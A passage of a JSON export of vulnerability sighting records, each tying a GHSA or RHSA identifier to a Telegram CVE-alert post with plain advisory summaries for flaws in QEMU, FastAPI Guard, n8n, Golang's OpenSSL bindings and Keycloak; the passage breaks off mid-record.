"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2962", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6693\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: A stack based buffer overflow was found in the virtio-net device of QEMU. This issue occurs when flushing TX in the virtio_net_flush_tx function if guest features VIRTIO_NET_F_HASH_REPORT, VIRTIO_F_VERSION_1 and VIRTIO_NET_F_MRG_RXBUF are enabled. This could allow a malicious user to overwrite local variables allocated on the stack. Specifically, the `out_sg` variable could be used to read a part of process memory and send it to the wire, causing an information leak.\n\ud83d\udccf Published: 2024-01-02T09:15:08.280Z\n\ud83d\udccf Modified: 2025-05-06T08:11:12.675Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2962\n2. https://access.redhat.com/errata/RHSA-2025:4492\n3. https://access.redhat.com/security/cve/CVE-2023-6693\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2254580", "creation_timestamp": "2025-05-06T08:20:26.000000Z"}, {"uuid": "3afa253f-7f9b-4106-961b-c92f70acd72c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77Q8-QMJ7-X7PP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15212", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46814\n\ud83d\udd25 CVSS Score: 3.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially inject arbitrary IP addresses into the request. This vulnerability can allow attackers to bypass IP-based access controls, mislead logging systems, and impersonate trusted clients. It is especially impactful when the application relies on the X-Forwarded-For header for IP-based authorization or authentication. Users should upgrade to FastAPI Guard version 2.0.0 to receive a fix.\n\ud83d\udccf Published: 2025-05-06T14:55:48.766Z\n\ud83d\udccf Modified: 2025-05-06T19:51:34.278Z\n\ud83d\udd17 References:\n1. https://github.com/rennf93/fastapi-guard/security/advisories/GHSA-77q8-qmj7-x7pp\n2. https://github.com/rennf93/fastapi-guard/commit/0b003fda4c678c1b514e95f319aee88113e9bf4b", "creation_timestamp": "2025-05-06T20:21:16.000000Z"}, {"uuid": "a6737e12-fb65-4df1-8ad7-c02163883859", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9884-9QM3-HQCH", "type": "seen", "source": "Telegram/o-uTgZiWLI4DGr-3Qx2v6r5S9u58WJIjtqdTFR62kB0PIWs", "content": "", "creation_timestamp": "2026-04-17T21:22:46.000000Z"}, {"uuid": "21cbbc0b-d1f2-4974-9455-0656740db9b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89MQ-229G-X47P", "type": "seen", "source": "Telegram/o-uTgZiWLI4DGr-3Qx2v6r5S9u58WJIjtqdTFR62kB0PIWs", "content": "", "creation_timestamp": "2026-04-17T21:22:46.000000Z"}, {"uuid": "e9f1c01f-2d00-49ef-872a-07e78a720509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRCW-WPJX-PR95", "type": "seen", "source": "Telegram/o-uTgZiWLI4DGr-3Qx2v6r5S9u58WJIjtqdTFR62kB0PIWs", "content": "", "creation_timestamp": "2026-04-17T21:22:46.000000Z"}, {"uuid": "d17d6c44-8f97-41eb-98c8-9a8f2144369f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFV6-X22W-GRHF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19581", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-6703\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/AU:Y/R:A/RE:L/U:Clear)\n\ud83d\udd39 Description: Improper Input Validation vulnerability in Mozilla neqo leads to an unexploitable crash..This issue affects neqo: from 0.4.24 through 0.13.2.\n\ud83d\udccf Published: 2025-06-26T09:30:03.893Z\n\ud83d\udccf Modified: 2025-06-26T09:30:03.893Z\n\ud83d\udd17 References:\n1. https://github.com/mozilla/neqo/security/advisories/GHSA-jfv6-x22w-grhf", "creation_timestamp": "2025-06-26T09:50:40.000000Z"}, {"uuid": "a2f7f43d-c38c-4faa-9835-c83850356595", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5VJ6-WJR7-5V9F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19646", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49592\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: n8n is a workflow automation platform. Versions prior to 1.98.0 have an Open Redirect vulnerability in the login flow. Authenticated users can be redirected to untrusted, attacker-controlled domains after logging in, by crafting malicious URLs with a misleading redirect query parameter. This may lead to phishing attacks by impersonating the n8n UI on lookalike domains (e.g., n8n.local.evil.com), credential or 2FA theft if users are tricked into re-entering sensitive information, and/or reputation risk due to the visual similarity between attacker-controlled domains and trusted ones. The vulnerability affects anyone hosting n8n and exposing the `/signin` endpoint to users. The issue has been patched in version 1.98.0. All users should upgrade to this version or later. The fix introduces strict origin validation for redirect URLs, ensuring only same-origin or relative paths are allowed after login.\n\ud83d\udccf Published: 2025-06-26T19:45:27.862Z\n\ud83d\udccf Modified: 2025-06-26T19:45:27.862Z\n\ud83d\udd17 References:\n1. https://github.com/n8n-io/n8n/security/advisories/GHSA-5vj6-wjr7-5v9f\n2. https://github.com/n8n-io/n8n/pull/16034\n3. https://github.com/n8n-io/n8n/commit/4865d1e360a0fe7b045e295b5e1a29daad12314e\n4. https://github.com/n8n-io/n8n/releases/tag/n8n%401.98.0", "creation_timestamp": "2025-06-26T19:50:46.000000Z"}, {"uuid": "d09d6a19-3aa0-4852-8707-fbb354e4987c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR93-4VX7-332P", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15180", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-3337\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L)\n\ud83d\udd39 Description: It was possible for a user to delete a VPN profile from WARP mobile client on iOS platform despite the  Lock WARP switch https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch \u00a0feature\n being enabled on Zero Trust Platform. This led to bypassing policies \nand restrictions enforced for enrolled devices by the Zero Trust \nplatform.\n\n\n\n\n\ud83d\udccf Published: 2022-10-28T09:25:31.596Z\n\ud83d\udccf Modified: 2025-05-06T17:41:15.374Z\n\ud83d\udd17 References:\n1. https://github.com/cloudflare/advisories/security/advisories/GHSA-vr93-4vx7-332p", "creation_timestamp": "2025-05-06T18:21:36.000000Z"}, {"uuid": "52ea8e56-f6b9-4033-9970-b522252bff0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5M6-7M43-PJV9", "type": "published-proof-of-concept", "source": "Telegram/GxkwnkIopWEGLbC11BdcbbYVRqOADIf4t7f5VnXFMKG7Kn8", "content": "", "creation_timestamp": "2026-04-17T21:23:11.000000Z"}, {"uuid": "bd970845-c5d7-4c88-b545-9317178fe133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4560", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15835", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32050\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in libsoup. The libsoup append_param_quoted() function may contain an overflow bug resulting in a buffer under-read.\n\ud83d\udccf Published: 2025-04-03T13:36:29.141Z\n\ud83d\udccf Modified: 2025-05-09T20:16:05.822Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32050\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357067", "creation_timestamp": "2025-05-09T20:26:07.000000Z"}, {"uuid": "6bea7ec4-269c-48de-beb6-f754462ce206", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4V4-5MWR-2FWR", "type": "published-proof-of-concept", "source": "Telegram/tNtN6ajST1i0h_Z4W2szdcVpxF1Em9wIkkVyc-W9Ntpka1A", "content": "", "creation_timestamp": "2026-04-17T23:20:34.000000Z"}, {"uuid": "8c84c837-738a-4ed0-ae07-4c2e22b2d4bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR3M-XW4C-JQW3", "type": "published-proof-of-concept", "source": "Telegram/u5f3Gra6Haipf3VJEB4yu-gwc95-0FLxvYnhbIvKSTo7fn8", "content": "", "creation_timestamp": "2026-04-18T01:18:04.000000Z"}, {"uuid": "5aaa628e-f6cd-496a-82a1-9eb01fbdefdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1640", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "b5035f06-0173-4c6d-a5d1-f060b62ad6c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4581", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "4b890ce6-561c-4dec-964b-44237522d2df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V7XQ-3WX6-FQC2", "type": "published-proof-of-concept", "source": "Telegram/u5f3Gra6Haipf3VJEB4yu-gwc95-0FLxvYnhbIvKSTo7fn8", "content": "", "creation_timestamp": "2026-04-18T01:18:04.000000Z"}, {"uuid": "cbc51c8c-21e8-439e-9698-fe42231964e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63X8-X938-VX33", "type": "published-proof-of-concept", "source": "Telegram/u5f3Gra6Haipf3VJEB4yu-gwc95-0FLxvYnhbIvKSTo7fn8", "content": "", "creation_timestamp": "2026-04-18T01:18:04.000000Z"}, {"uuid": "123f0ae5-5b4b-4f62-9f3d-0d3d4c5d5c1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4057", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15516", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-05-08T11:58:27.481Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-05-08T12:24:12.000000Z"}, {"uuid": "ce035a58-2530-49a5-930f-9ae111d2faa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2945", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15516", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-05-08T11:58:27.481Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-05-08T12:24:12.000000Z"}, {"uuid": "4f27d65e-bb1f-42ee-a422-3e9dd3efdb2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5W59-32C8-933V", "type": "published-proof-of-concept", "source": "Telegram/lPGIWg_tQcs4RDQrNkGM74AEu7FEWLIcUMs54pp3qHTSOJE", "content": "", "creation_timestamp": "2026-04-18T01:18:19.000000Z"}, {"uuid": "d314f236-50e5-4a1f-8334-49ce280a2f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1868", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15516", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-05-08T11:58:27.481Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-05-08T12:24:12.000000Z"}, {"uuid": "c7c4f3c4-9c76-472d-8763-2ab5ff61c965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1353", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15516", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-05-08T11:58:27.481Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-05-08T12:24:12.000000Z"}, {"uuid": "3ae09166-4be5-48d1-81f8-309b3e8f17c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1867", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15516", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-05-08T11:58:27.481Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-05-08T12:24:12.000000Z"}, {"uuid": "acd9e9b3-a33e-4df5-928c-0824ca43a17b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC37-VX3W-34FG", "type": "published-proof-of-concept", "source": "Telegram/lPGIWg_tQcs4RDQrNkGM74AEu7FEWLIcUMs54pp3qHTSOJE", "content": "", "creation_timestamp": "2026-04-18T01:18:19.000000Z"}, {"uuid": "0e6a2a0c-0484-4d01-b509-a1bf4368d194", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2M2V-V563-QQVJ", "type": "published-proof-of-concept", "source": "Telegram/lPGIWg_tQcs4RDQrNkGM74AEu7FEWLIcUMs54pp3qHTSOJE", "content": "", "creation_timestamp": "2026-04-18T01:18:19.000000Z"}, {"uuid": "89991c3b-991e-47d4-a28a-84e9868847f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9W9F-6MG8-JP7W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15529", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31022\n\ud83d\udd25 